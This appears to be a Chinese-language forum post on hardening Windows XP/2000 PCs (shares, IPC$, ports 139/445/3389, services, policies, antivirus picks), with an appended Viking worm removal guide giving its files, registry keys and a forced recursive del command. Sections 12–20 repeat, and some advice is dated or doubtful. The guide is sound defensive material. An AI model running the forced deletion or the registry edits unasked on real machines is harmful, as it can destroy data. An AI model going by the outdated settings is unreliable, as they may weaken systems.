1.交互式登陸.不需要按 Ctrl+Alt+Del 啟用 [根據(jù)個人需要,? 但是我個人是不需要直接輸入密碼登陸的]
2.網(wǎng)絡(luò)訪問.不允許SAM帳戶的匿名枚舉 啟用
3.網(wǎng)絡(luò)訪問.可匿名的共享 將后面的值刪除
4.網(wǎng)絡(luò)訪問.可匿名的命名管道 將后面的值刪除
5.網(wǎng)絡(luò)訪問.可遠程訪問的注冊表路徑 將后面的值刪除
6.網(wǎng)絡(luò)訪問.可遠程訪問的注冊表的子路徑 將后面的值刪除
7.網(wǎng)絡(luò)訪問.限制匿名訪問命名管道和共享
8.帳戶.(前面已經(jīng)詳細講過拉 )
13、用戶權(quán)限分配策略:
打開管理工具
找到本地安全設(shè)置.本地策略.用戶權(quán)限分配
1.從網(wǎng)絡(luò)訪問計算機 里面一般默認有5個用戶,除Admin外我們刪除4個,當然,等下我們還得建一個屬于自己的ID
2.從遠程系統(tǒng)強制關(guān)機,Admin帳戶也刪除,一個都不留
3.拒絕從網(wǎng)絡(luò)訪問這臺計算機 將ID刪除
4.從網(wǎng)絡(luò)訪問此計算機,Admin也可刪除,如果你不使用類似3389服務(wù)
5.通過遠端強制關(guān)機。刪掉
14、終端服務(wù)配置
打開管理工具
終端服務(wù)配置
1.打開后,點連接,右鍵,屬性,遠程控制,點不允許遠程控制
2.常規(guī),加密級別,高,在使用標準Windows驗證上點√!
3.網(wǎng)卡,將最多連接數(shù)上設(shè)置為0
4.高級,將里面的權(quán)限也刪除.[我沒設(shè)置]
再點服務(wù)器設(shè)置,在Active Desktop上,設(shè)置禁用,且限制每個使用一個會話
15、用戶和組策略
打開管理工具
計算機管理.本地用戶和組.用戶;
刪除Support_388945a0用戶等等
只留下你更改好名字的adminisrator權(quán)限
計算機管理.本地用戶和組.組
組.我們就不分組了,每必要把
16、自己動手DIY在本地策略的安全選項
1)當?shù)顷憰r間用完時自動注銷用戶(本地) 防止黑客密碼滲透.
2)登陸屏幕上不顯示上次登陸名(遠程)如果開放3389服務(wù),別人登陸時,就不會殘留有你登陸的用戶名.讓他去猜你的用戶名去吧.
3)對匿名連接的額外限制
4)禁止按 alt+crtl +del(沒必要)
5)允許在未登陸前關(guān)機[防止遠程關(guān)機/啟動、強制關(guān)機/啟動]
6)只有本地登陸用戶才能訪問cd-rom
7)只有本地登陸用戶才能訪問軟驅(qū)
8)取消關(guān)機原因的提示
A、打開控制面板窗口,雙擊“電源選項”圖標,在隨后出現(xiàn)的電源屬性窗口中,進入到“高級”標簽頁面;
B、在該頁面的“電源按鈕”設(shè)置項處,將“在按下計算機電源按鈕時”設(shè)置為“關(guān)機”,單擊“確定”按鈕,來退出設(shè)置框;
C、以后需要關(guān)機時,可以直接按下電源按鍵,就能直接關(guān)閉計算機了。當然,我們也能啟用休眠功能鍵,來實現(xiàn)快速關(guān)機和開機;
D、要是系統(tǒng)中沒有啟用休眠模式的話,可以在控制面板窗口中,打開電源選項,進入到休眠標簽頁面,并在其中將“啟用休眠”選項選中就可以了。
9)禁止關(guān)機事件跟蹤
開始“Start -/>”運行“ Run -/>輸入”gpedit.msc “,在出現(xiàn)的窗口的左邊部分,選擇 ”計算機配置“(Computer Configuration )-/> ”管理模板“(Administrative Templates)-/> ”系統(tǒng)“(System),在右邊窗口雙擊“Shutdown Event Tracker” 在出現(xiàn)的對話框中選擇“禁止”(Disabled),點擊然后“確定”(OK)保存后退出這樣,你將看到類似于Windows 2000的關(guān)機窗口
17、常見端口的介紹
TCP
21 FTP
22 SSH
23 TELNET
25 TCP SMTP
53 TCP DNS
80 HTTP
135 epmap
138 [沖擊波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWhere
5632 UDP PCANYWhere
3389 Terminal Services
4444[沖擊波]
UDP
67[沖擊波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
關(guān)于UDP一般只有騰訊QQ會打開4000或者是8000端口或者8080,那么,我們只運 行本機使用4000這幾個端口就行了
18、另外介紹一下如何查看本機打開的端口和tcp\ip端口的過濾
開始--運行--cmd
輸入命令netstat -a
會看到例如(這是我的機器開放的端口)
Proto Local Address Foreign Address State
TCP yf001:epmap yf001:0 LISTE
TCP yf001:1025 yf001:0 LISTE
TCP (用戶名):1035 yf001:0 LISTE
TCP yf001:netbios-ssn yf001:0 LISTE
UDP yf001:1129 *:*
UDP yf001:1183 *:*
UDP yf001:1396 *:*
UDP yf001:1464 *:*
UDP yf001:1466 *:*
UDP yf001:4000 *:*
UDP yf001:4002 *:*
UDP yf001:6000 *:*
UDP yf001:6001 *:*
UDP yf001:6002 *:*
UDP yf001:6003 *:*
UDP yf001:6004 *:*
UDP yf001:6005 *:*
UDP yf001:6006 *:*
UDP yf001:6007 *:*
UDP yf001:1030 *:*
UDP yf001:1048 *:*
UDP yf001:1144 *:*
UDP yf001:1226 *:*
UDP yf001:1390 *:*
UDP yf001:netbios-ns *:*
UDP yf001:netbios-dgm *:*
UDP yf001:isakmp *:*
現(xiàn)在講講基于Windows的tcp/ip的過濾
控制面板——網(wǎng)絡(luò)和撥號連接——本地連接——INTERNET協(xié)議(tcp/ip)--屬性--高級---選項-tcp/ip篩選--屬性!!
然后添加需要的tcp 和UDP端口就可以了~如果對端口不是很了解的話,不要輕易進行過濾,不然可能會導致一些程序無法使用。
19、關(guān)于瀏覽器
IE瀏覽器(或基于IE內(nèi)核的瀏覽器)存在隱私問題,index.dat文件里記錄著你上網(wǎng)的信息。所以我推薦大家換一款其他內(nèi)核瀏覽器。
現(xiàn)在炒的很熱的FireFox,就很不錯,如果你想打造一款屬于自己的個性化瀏覽器,那FireFox是首選。它有強大的擴展定制功能!
還有傳說中那款最快的瀏覽器 Opera ,速度驚人,界面華麗,筆者正在使用。(就在3個小時前,OPERA公司10年慶祝送正式注冊碼,筆者申請了兩個,^_^)
當然,由于國內(nèi)一些網(wǎng)頁并不是用WC3組織認證的標準HTML語言編寫,所以IE還是不能丟,留作備用。
處理IE隱私可以用:Webroot WindowWasher -- www.hanzify.org 上有正式版+漢化補丁
Ccleaner -- GOOGLE一下,官方占上有,多國語言的。
RAMDISK 用內(nèi)存虛擬出一塊硬盤,將緩存文件寫進去,不僅解決了隱私問題,理論上還能提高網(wǎng)速。(建議內(nèi)存/>=512M者使用)
20、最后一招,也是最關(guān)鍵的一招:安裝殺軟與防火墻
殺毒軟件要看實力,絕對不能看廣告。筆者在霏凡的病毒區(qū)混了半年,把殺軟幾乎也裝了個遍,以下是個人心得:
1:國產(chǎn)殺軟:江民一出,誰與爭峰?KV的敗筆就是當年那個硬盤炸彈吧,呵呵。其實論實力,江民在國內(nèi)絕對是一支獨秀。先進的殺毒引擎,較完整的病毒庫,
清除活體病毒能力強,殺殼能力強,可殺連環(huán)DLL,監(jiān)控靈敏,占系統(tǒng)內(nèi)存小。--聲明:我不是KV的槍手,因為國內(nèi)的殺軟公司普遍只會打廣告,應(yīng)該BS一下。
DB2005都到了2005了才殺兩個殼?Rising的誤報天下第一,可是隨便下個毒包基本上沒有它報的(不信的去霏凡病毒區(qū)試試:bbs.crsky.com);費爾還不錯,
可是與KV比還有差距;光華雖然是主動升級,但毒庫也不是很全。
2:國外殺軟:百家爭鳴!
Kapersky:這款俄國的殺軟在國內(nèi)極度火熱,其擁有世界第一的毒庫,毒庫3小時一升級,對系統(tǒng)提供最完善的保護。
McAfee:美國殺軟,柔和而強勁的保護,適合有點資歷的用戶。規(guī)則指定得當,百毒不侵。
Norton: 唉!老了老了,對國內(nèi)木馬簡直是白癡。本不想說它,可是又是國際三大殺軟之一,唉!
NOD32:占資源超小,殺毒超快,監(jiān)控靈敏,只是毒庫似乎有些不全。
BitDefender:羅馬尼亞不錯的殺軟,能力平衡。
GData AntiVirusKit:真正的強悍!它用Kapersky+BitDefender的雙引擎,而且經(jīng)優(yōu)化處理,系統(tǒng)不會很卡。
F-Scure:竟然夸張到4引擎!不過除了Kapersky4.0的引擎,其他的很一般。雖然保護是很周到,但用它筆者覺得不如AVK(上一個)。
筆者建議:一般配置 KV2005 or McAfee or Kapersky or GData AntiVirusKit;-配置稍好的可以用以上任一款(除KV2005)+ KV2004
老爺機配置 KV2004 or NOD32
較好的機器 GData AntiVirusKit+KV2005 or Kapersky+KV2005 or McAfee+KV2005
防火墻,系統(tǒng)的最后一道防線。即使殺軟再強大,一些最新變種的木馬仍能見縫插針。沒有防火墻,你的機器很可能成為Haker的代理服務(wù)器,呵呵。還有,如果你的
系統(tǒng)有漏洞,Haker也會輕而易舉的Contral Your PC.
強大的防火墻推薦:Look 'n' Stop :世界測評第一。占內(nèi)存超小。啟動超迅速。
ZoneAlarm :性力強大,功能很多,全面且穩(wěn)定。
Tiny :這是一款專業(yè)到恐怖的防火墻,能力絕對強悍!適合較專業(yè)者使用。
天網(wǎng):國內(nèi)最強的了,只是和國外的比......
說一句,木馬專殺的東西幾乎沒用,因為那些根本沒有什么先進的引擎。如果一定要,就用ewido吧,這個還可以。
由于現(xiàn)在家用電腦所使用的操作系統(tǒng)多數(shù)為WinXP 和Win2000 pro(建議還在使用98的朋友換換系統(tǒng),連_blank/>微軟都放棄了的系統(tǒng)你還用它干嘛?)所以后面我將主要講一下基于這兩個操作系統(tǒng)的安全防范。
個人電腦常見的被入侵方式
談到個人上網(wǎng)時的安全,還是先把大家可能會遇到的問題歸個類吧。我們遇到的入侵方式大概包括了以下幾種:
(1) 被他人盜取密碼;
(2) 系統(tǒng)被_blank/>木馬攻擊;
(3) 瀏覽網(wǎng)頁時被惡意的java scrpit程序攻擊;
(4) QQ被攻擊或泄漏信息;
(5) 病毒感染;
(6) 系統(tǒng)存在漏洞使他人攻擊自己。
(7) _blank/>黑客的惡意攻擊。
下面我們就來看看通過什么樣的手段來更有效的防范攻擊。
查本地共享資源
刪除共享
刪除ipc$空連接
賬號密碼的安全原則
關(guān)閉自己的139端口
445端口的關(guān)閉
3389的關(guān)閉
4899的防范
常見端口的介紹
如何查看本機打開的端口和過濾
禁用服務(wù)
本地策略
本地安全策略
用戶權(quán)限分配策略
終端服務(wù)配置
用戶和組策略
防止rpc漏洞
自己動手DIY在本地策略的安全選項
工具介紹
避免被惡意代碼 木馬等病毒攻擊
1.查看本地共享資源
運行CMD輸入net share,如果看到有異常的共享,那么應(yīng)該關(guān)閉。但是有時你關(guān)閉共享下次開機的時候又出現(xiàn)了,那么你應(yīng)該考慮一下,你的機器是否已經(jīng)被黑客所控制了,或者中了病毒。
2.刪除共享(每次輸入一個)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續(xù)刪除)
3.刪除ipc$空連接
在運行內(nèi)輸入regedit,在_blank/>注冊表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 項里數(shù)值名稱RestrictAnonymous的數(shù)值數(shù)據(jù)由0改為1。
4.關(guān)閉自己的139端口,ipc和RPC漏洞存在于此。
關(guān)閉139端口的方法是在“網(wǎng)絡(luò)和撥號連接”中“本地連接”中選取“Internet協(xié)議(TCP/IP)”屬性,進入“高級TCP/IP設(shè)置”“WinS設(shè)置”里面有一項“禁用TCP/IP的NETBIOS”,打勾就關(guān)閉了139端口。
5.防止rpc漏洞
打開管理工具——服務(wù)——找到RPC(Remote Procedure Call (RPC) Locator)服務(wù)——將故障恢復中的第一次失敗,第二次失敗,后續(xù)失敗,都設(shè)置為不操作。
XP SP2和2000 pro sp4,均不存在該漏洞。
6.445端口的關(guān)閉
修改注冊表,添加一個鍵值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一個SMBDeviceEnabled 為REG_DWORD類型鍵值為0這樣就ok了。
7.3389的關(guān)閉
XP:我的電腦上點右鍵選屬性--/>遠程,將里面的遠程協(xié)助和遠程桌面兩個選項框里的勾去掉。
Win2000server 開始--/>程序--/>管理工具--/>服務(wù)里找到Terminal Services服務(wù)項,選中屬性選項將啟動類型改成手動,并停止該服務(wù)。(該方法在XP同樣適用)
使用2000 pro的朋友注意,網(wǎng)絡(luò)上有很多文章說在Win2000pro 開始--/>設(shè)置--/>控制面板--/>管理工具--/>服務(wù)里找到Terminal Services服務(wù)項,選中屬性選項將啟動類型改成手動,并停止該服務(wù),可以關(guān)閉3389,其實在2000pro 中根本不存在Terminal Services。
8.4899的防范
網(wǎng)絡(luò)上有許多關(guān)于3389和4899的入侵方法。4899其實是一個遠程控制軟件所開啟的服務(wù)端端口,由于這些控制軟件功能強大,所以經(jīng)常被黑客用來控制自己的肉雞,而且這類軟件一般不會被殺毒軟件查殺,比后門還要安全。
4899不象3389那樣,是系統(tǒng)自帶的服務(wù)。需要自己安裝,而且需要將服務(wù)端上傳到入侵的電腦并運行服務(wù),才能達到控制的目的。
所以只要你的電腦做了基本的安全配置,黑客是很難通過4899來控制你的。
9、禁用服務(wù)
若PC沒有特殊用途,基于安全考慮,打開控制面板,進入管理工具——服務(wù),關(guān)閉以下服務(wù):
1.Alerter[通知選定的用戶和計算機管理警報]
2.ClipBook[啟用“剪貼簿查看器”儲存信息并與遠程計算機共享]
3.Distributed File System[將分散的文件共享合并成一個邏輯名稱,共享出去,關(guān)閉后遠程計算機無法訪問共享
4.Distributed Link Tracking Server[適用局域網(wǎng)分布式鏈接]
5.Indexing Service[提供本地或遠程計算機上文件的索引內(nèi)容和屬性,泄露信息]
6.Messenger[警報]
7.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客戶信息收集]
8.Network DDE[為在同一臺計算機或不同計算機上運行的程序提供動態(tài)數(shù)據(jù)交換]
9.Network DDE DSDM[管理動態(tài)數(shù)據(jù)交換 (DDE) 網(wǎng)絡(luò)共享]
10.Remote Desktop Help Session Manager[管理并控制遠程協(xié)助]
11.Remote Registry[使遠程計算機用戶修改本地注冊表]
12.Routing and Remote Access[在局域網(wǎng)和廣域往提供路由服務(wù).黑客理由路由服務(wù)刺探注冊信息]
13.Server[支持此計算機通過網(wǎng)絡(luò)的文件、打印、和命名管道共享]
14.TCP/IPNetBIOS Helper[提供 TCP/IP 服務(wù)上的 NetBIOS 和網(wǎng)絡(luò)上客戶端的 NetBIOS 名稱解析的支持而使用戶能夠共享文件、打印和登錄到網(wǎng)絡(luò)]
15.Telnet[允許遠程用戶登錄到此計算機并運行程序]
16.Terminal Services[允許用戶以交互方式連接到遠程計算機]
17.Window s Image Acquisition (WIA)[照相服務(wù),應(yīng)用與數(shù)碼攝象機]
如果發(fā)現(xiàn)機器開啟了一些很奇怪的服務(wù),如r_server這樣的服務(wù),必須馬上停止該服務(wù),因為這完全有可能是黑客使用控制程序的服務(wù)端。
10、賬號密碼的安全原則
首先禁用guest帳號,將系統(tǒng)內(nèi)建的administrator帳號改名~~(改的越復雜越好,最好改成中文的),然后設(shè)置一個密碼,最好是8位以上字母數(shù)字符號組合。 (讓那些該死的黑客慢慢猜去吧~)
如果你使用的是其他帳號,最好不要將其加進administrators,如果加入administrators組,一定也要設(shè)置一個足夠安全的密碼,同上如果你設(shè)置adminstrator的密碼時,最好在安全模式下設(shè)置,因為經(jīng)我研究發(fā)現(xiàn),在系統(tǒng)中擁有最高權(quán)限的帳號,不是正常登陸下的adminitrator帳號,因為即使有了這個帳號,同樣可以登陸安全模式,將sam文件刪除,從而更改系統(tǒng)的administrator的密碼!而在安全模式下設(shè)置的administrator則不會出現(xiàn)這種情況,因為不知道這個administrator密碼是無法進入安全模式。權(quán)限達到最大這個是密碼策略:用戶可以根據(jù)自己的習慣設(shè)置密碼,下面是我建議的設(shè)置(關(guān)于密碼安全設(shè)置,我上面已經(jīng)講了,這里不再羅嗦了。
打開管理工具.本地安全設(shè)置.密碼策略
1.密碼必須符合復雜要求性.啟用
2.密碼最小值.我設(shè)置的是8
3.密碼最長使用期限.我是默認設(shè)置42天
4.密碼最短使用期限0天
5.強制密碼歷史 記住0個密碼
6.用可還原的_blank/>加密來存儲密碼 禁用
11、本地策略:
這個很重要,可以幫助我們發(fā)現(xiàn)那些心存叵測的人的一舉一動,還可以幫助我們將來追查黑客。
(雖然一般黑客都會在走時會清除他在你電腦中留下的痕跡,不過也有一些不小心的)
打開管理工具
找到本地安全設(shè)置.本地策略.審核策略
1.審核策略更改 成功失敗
2.審核登陸事件 成功失敗
3.審核對象訪問 失敗
4.審核跟蹤過程 無審核
5.審核目錄服務(wù)訪問 失敗
6.審核特權(quán)使用 失敗
7.審核系統(tǒng)事件 成功失敗
8.審核帳戶登陸時間 成功失敗
9.審核帳戶管理 成功失敗
&nb sp;然后再到管理工具找到
事件查看器
應(yīng)用程序:右鍵/>屬性/>設(shè)置日志大小上限,我設(shè)置了50mb,選擇不覆蓋事件
安全性:右鍵/>屬性/>設(shè)置日志大小上限,我也是設(shè)置了50mb,選擇不覆蓋事件
系統(tǒng):右鍵/>屬性/>設(shè)置日志大小上限,我都是設(shè)置了50mb,選擇不覆蓋事件
12、本地安全策略:
打開管理工具
找到本地安全設(shè)置.本地策略.安全選項
1.交互式登陸.不需要按 Ctrl+Alt+Del 啟用 [根據(jù)個人需要,? 但是我個人是不需要直接輸入密碼登陸的]
2.網(wǎng)絡(luò)訪問.不允許SAM帳戶的匿名枚舉 啟用
3.網(wǎng)絡(luò)訪問.可匿名的共享 將后面的值刪除
4.網(wǎng)絡(luò)訪問.可匿名的命名管道 將后面的值刪除
5.網(wǎng)絡(luò)訪問.可遠程訪問的注冊表路徑 將后面的值刪除
6.網(wǎng)絡(luò)訪問.可遠程訪問的注冊表的子路徑 將后面的值刪除
7.網(wǎng)絡(luò)訪問.限制匿名訪問命名管道和共享
8.帳戶.(前面已經(jīng)詳細講過拉 )
13、用戶權(quán)限分配策略:
打開管理工具
找到本地安全設(shè)置.本地策略.用戶權(quán)限分配
1.從網(wǎng)絡(luò)訪問計算機 里面一般默認有5個用戶,除Admin外我們刪除4個,當然,等下我們還得建一個屬于自己的ID
2.從遠程系統(tǒng)強制關(guān)機,Admin帳戶也刪除,一個都不留
3.拒絕從網(wǎng)絡(luò)訪問這臺計算機 將ID刪除
4.從網(wǎng)絡(luò)訪問此計算機,Admin也可刪除,如果你不使用類似3389服務(wù)
5.通過遠端強制關(guān)機。刪掉
14、終端服務(wù)配置
打開管理工具
終端服務(wù)配置
1.打開后,點連接,右鍵,屬性,遠程控制,點不允許遠程控制
2.常規(guī),加密級別,高,在使用標準Windows驗證上點√!
3.網(wǎng)卡,將最多連接數(shù)上設(shè)置為0
4.高級,將里面的權(quán)限也刪除.[我沒設(shè)置]
再點服務(wù)器設(shè)置,在Active Desktop上,設(shè)置禁用,且限制每個使用一個會話
15、用戶和組策略
打開管理工具
計算機管理.本地用戶和組.用戶;
刪除Support_388945a0用戶等等
只留下你更改好名字的adminisrator權(quán)限
計算機管理.本地用戶和組.組
組.我們就不分組了,每必要把
16、自己動手DIY在本地策略的安全選項
1)當?shù)顷憰r間用完時自動注銷用戶(本地) 防止黑客密碼滲透.
2)登陸屏幕上不顯示上次登陸名(遠程)如果開放3389服務(wù),別人登陸時,就不會殘留有你登陸的用戶名.讓他去猜你的用戶名去吧.
3)對匿名連接的額外限制
4)禁止按 alt+crtl +del(沒必要)
5)允許在未登陸前關(guān)機[防止遠程關(guān)機/啟動、強制關(guān)機/啟動]
6)只有本地登陸用戶才能訪問cd-rom
7)只有本地登陸用戶才能訪問軟驅(qū)
8)取消關(guān)機原因的提示
A、打開控制面板窗口,雙擊“電源選項”圖標,在隨后出現(xiàn)的電源屬性窗口中,進入到“高級”標簽頁面;
B、在該頁面的“電源按鈕”設(shè)置項處,將“在按下計算機電源按鈕時”設(shè)置為“關(guān)機”,單擊“確定”按鈕,來退出設(shè)置框;
C、以后需要關(guān)機時,可以直接按下電源按鍵,就能直接關(guān)閉計算機了。當然,我們也能啟用休眠功能鍵,來實現(xiàn)快速關(guān)機和開機;
D、要是系統(tǒng)中沒有啟用休眠模式的話,可以在控制面板窗口中,打開電源選項,進入到休眠標簽頁面,并在其中將“啟用休眠”選項選中就可以了。
9)禁止關(guān)機事件跟蹤
開始“Start -/>”運行“ Run -/>輸入”gpedit.msc “,在出現(xiàn)的窗口的左邊部分,選擇 ”計算機配置“(Computer Configuration )-/> ”管理模板“(Administrative Templates)-/> ”系統(tǒng)“(System),在右邊窗口雙擊“Shutdown Event Tracker” 在出現(xiàn)的對話框中選擇“禁止”(Disabled),點擊然后“確定”(OK)保存后退出這樣,你將看到類似于Windows 2000的關(guān)機窗口
17、常見端口的介紹
TCP
21 FTP
22 SSH
23 TELNET
25 TCP SMTP
53 TCP DNS
80 HTTP
135 epmap
138 [沖擊波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWhere
5632 UDP PCANYWhere
3389 Terminal Services
4444[沖擊波]
UDP
67[沖擊波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
關(guān)于UDP一般只有騰訊QQ會打開4000或者是8000端口或者8080,那么,我們只運 行本機使用4000這幾個端口就行了
18、另外介紹一下如何查看本機打開的端口和tcp\ip端口的過濾
開始--運行--cmd
輸入命令netstat -a
會看到例如(這是我的機器開放的端口)
Proto Local Address Foreign Address State
TCP yf001:epmap yf001:0 LISTE
TCP yf001:1025 yf001:0 LISTE
TCP (用戶名):1035 yf001:0 LISTE
TCP yf001:netbios-ssn yf001:0 LISTE
UDP yf001:1129 *:*
UDP yf001:1183 *:*
UDP yf001:1396 *:*
UDP yf001:1464 *:*
UDP yf001:1466 *:*
UDP yf001:4000 *:*
UDP yf001:4002 *:*
UDP yf001:6000 *:*
UDP yf001:6001 *:*
UDP yf001:6002 *:*
UDP yf001:6003 *:*
UDP yf001:6004 *:*
UDP yf001:6005 *:*
UDP yf001:6006 *:*
UDP yf001:6007 *:*
UDP yf001:1030 *:*
UDP yf001:1048 *:*
UDP yf001:1144 *:*
UDP yf001:1226 *:*
UDP yf001:1390 *:*
UDP yf001:netbios-ns *:*
UDP yf001:netbios-dgm *:*
UDP yf001:isakmp *:*
現(xiàn)在講講基于Windows的tcp/ip的過濾
控制面板——網(wǎng)絡(luò)和撥號連接——本地連接——INTERNET協(xié)議(tcp/ip)--屬性--高級---選項-tcp/ip篩選--屬性!!
然后添加需要的tcp 和UDP端口就可以了~如果對端口不是很了解的話,不要輕易進行過濾,不然可能會導致一些程序無法使用。
19、關(guān)于瀏覽器
IE瀏覽器(或基于IE內(nèi)核的瀏覽器)存在隱私問題,index.dat文件里記錄著你上網(wǎng)的信息。所以我推薦大家換一款其他內(nèi)核瀏覽器。
現(xiàn)在炒的很熱的FireFox,就很不錯,如果你想打造一款屬于自己的個性化瀏覽器,那FireFox是首選。它有強大的擴展定制功能!
還有傳說中那款最快的瀏覽器 Opera ,速度驚人,界面華麗,筆者正在使用。(就在3個小時前,OPERA公司10年慶祝送正式注冊碼,筆者申請了兩個,^_^)
當然,由于國內(nèi)一些網(wǎng)頁并不是用WC3組織認證的標準HTML語言編寫,所以IE還是不能丟,留作備用。
處理IE隱私可以用:Webroot WindowWasher -- www.hanzify.org 上有正式版+漢化補丁
Ccleaner -- GOOGLE一下,官方占上有,多國語言的。
RAMDISK 用內(nèi)存虛擬出一塊硬盤,將緩存文件寫進去,不僅解決了隱私問題,理論上還能提高網(wǎng)速。(建議內(nèi)存/>=512M者使用)
20、最后一招,也是最關(guān)鍵的一招:安裝殺軟與防火墻
殺毒軟件要看實力,絕對不能看廣告。筆者在霏凡的病毒區(qū)混了半年,把殺軟幾乎也裝了個遍,以下是個人心得:
1:國產(chǎn)殺軟:江民一出,誰與爭峰?KV的敗筆就是當年那個硬盤炸彈吧,呵呵。其實論實力,江民在國內(nèi)絕對是一支獨秀。先進的殺毒引擎,較完整的病毒庫,
清除活體病毒能力強,殺殼能力強,可殺連環(huán)DLL,監(jiān)控靈敏,占系統(tǒng)內(nèi)存小。--聲明:我不是KV的槍手,因為國內(nèi)的殺軟公司普遍只會打廣告,應(yīng)該BS一下。
DB2005都到了2005了才殺兩個殼?Rising的誤報天下第一,可是隨便下個毒包基本上沒有它報的(不信的去霏凡病毒區(qū)試試:bbs.crsky.com);費爾還不錯,
可是與KV比還有差距;光華雖然是主動升級,但毒庫也不是很全。
2:國外殺軟:百家爭鳴!
Kapersky:這款俄國的殺軟在國內(nèi)極度火熱,其擁有世界第一的毒庫,毒庫3小時一升級,對系統(tǒng)提供最完善的保護。
McAfee:美國殺軟,柔和而強勁的保護,適合有點資歷的用戶。規(guī)則指定得當,百毒不侵。
Norton: 唉!老了老了,對國內(nèi)木馬簡直是白癡。本不想說它,可是又是國際三大殺軟之一,唉!
NOD32:占資源超小,殺毒超快,監(jiān)控靈敏,只是毒庫似乎有些不全。
BitDefender:羅馬尼亞不錯的殺軟,能力平衡。
GData AntiVirusKit:真正的強悍!它用Kapersky+BitDefender的雙引擎,而且經(jīng)優(yōu)化處理,系統(tǒng)不會很卡。
F-Scure:竟然夸張到4引擎!不過除了Kapersky4.0的引擎,其他的很一般。雖然保護是很周到,但用它筆者覺得不如AVK(上一個)。
筆者建議:一般配置 KV2005 or McAfee or Kapersky or GData AntiVirusKit;-配置稍好的可以用以上任一款(除KV2005)+ KV2004
老爺機配置 KV2004 or NOD32
較好的機器 GData AntiVirusKit+KV2005 or Kapersky+KV2005 or McAfee+KV2005
防火墻,系統(tǒng)的最后一道防線。即使殺軟再強大,一些最新變種的木馬仍能見縫插針。沒有防火墻,你的機器很可能成為Haker的代理服務(wù)器,呵呵。還有,如果你的
系統(tǒng)有漏洞,Haker也會輕而易舉的Contral Your PC.
強大的防火墻推薦:Look 'n' Stop :世界測評第一。占內(nèi)存超小。啟動超迅速。
ZoneAlarm :性力強大,功能很多,全面且穩(wěn)定。
Tiny :這是一款專業(yè)到恐怖的防火墻,能力絕對強悍!適合較專業(yè)者使用。
天網(wǎng):國內(nèi)最強的了,只是和國外的比......
說一句,木馬專殺的東西幾乎沒用,因為那些根本沒有什么先進的引擎。如果一定要,就用ewido吧,這個還可以。
Worm.Win32.Viking.p威金變種的查殺
[ 2007-03-25 03:48:47 | 作者: sun ]
常常碰到名為“_desktop.ini”的一個隱藏文件。經(jīng)查是一種叫做威金的蠕蟲病毒。它的癥狀是感染10MB以下的可執(zhí)行程序,表現(xiàn)為改變程序的圖標,并且導致可執(zhí)行程序不能被執(zhí)行。計算機反應(yīng)變慢,斷網(wǎng)等現(xiàn)象。通過網(wǎng)上下載的專殺工具試圖驅(qū)逐無果,刪是刪不掉的,它從你的計算機的最后一個盤向上不停的復制。似乎只有通從新分區(qū)后再做重做系統(tǒng)才會徹底。但是這樣,就丟了計算機上很多寶貴的東東。
這幾天被病毒害苦了,到處都是_desktop.ini
網(wǎng)上搜了一下。。基本搞定, 下面這個方法不錯。
批量刪除_desktop.ini的命令
現(xiàn)在使用DOS命令批量刪除_desktop.ini,如下:
del d:\_desktop.ini /f/s/q/a
強制刪除d盤下所有目錄內(nèi)(包括d盤本身)的_desktop.ini文件并且不提示是否刪除
/f 強制刪除只讀文件
/q 指定靜音狀態(tài)。不提示您確認刪除。
/s 從當前目錄及其所有子目錄中刪除指定文件。顯示正在被刪除的文件名。
/a的意思是按照屬性來刪除了
這個命令的作用是在殺掉viking病毒之后清理系統(tǒng)內(nèi)殘留的_desktop.ini文件用的
手動清除方案:
1、手工清除請按照行為分析刪除對應(yīng)文件,恢復相關(guān)系統(tǒng)設(shè)置。
(1) 使用“進程管理”關(guān)閉病毒進程
(2) 刪除病毒文件
%WINDDIR%\rundl132.exe
%Program Files%\_desktop.ini
桌面\viDll.dll
系統(tǒng)根目錄\_desktop.ini
系統(tǒng)根目錄\1.txt
系統(tǒng)根目錄\MH_FILE\MH_DLL.dll
系統(tǒng)根目錄\TODAYZTKING\TODAYZTKING.dll
會在大量文件夾中釋放文件_desktop.ini
%WINDDIR%\0sy.exe
%WINDDIR%\1sy.exe
%WINDDIR%\2sy.exe
(3) 恢復病毒修改的注冊表項目,刪除病毒添加的注冊表項
HKEY_CURRENT_USER\Software\Microsoft\Windows NT
\CurrentVersion\Windows
鍵值: 字串: "load "="C:\WINDOWS\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: "ver_down0"="0.859: Source:C:\WINDOWS\system32\_0000012_.tmp.dll (3.0.3790.218001111)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down1"="0.687: 2006/06/13 20:52:04.23s444 (local)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down2"="0.859: Source:C:\WINDOWS\system32\_000006_.tmp.dll
(3.0.3790.21801)"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto
鍵值: 字串: "1"
下面是病毒的詳細資料:
病毒名稱: Worm.Win32.Viking.p
病毒類型: 蠕蟲
文件 MD5: E939658C090087B08A1CD498F2DB59B3
公開范圍: 完全公開
危害等級: 中
文件長度: 1,025,308 字節(jié)
感染系統(tǒng): windows98以上版本
開發(fā)工具: Borland Delphi V3.0
加殼類型: Upack 2.4 - 2.9 beta
命名對照: Symentec[W32.Looked.P]
Mcafee[無]
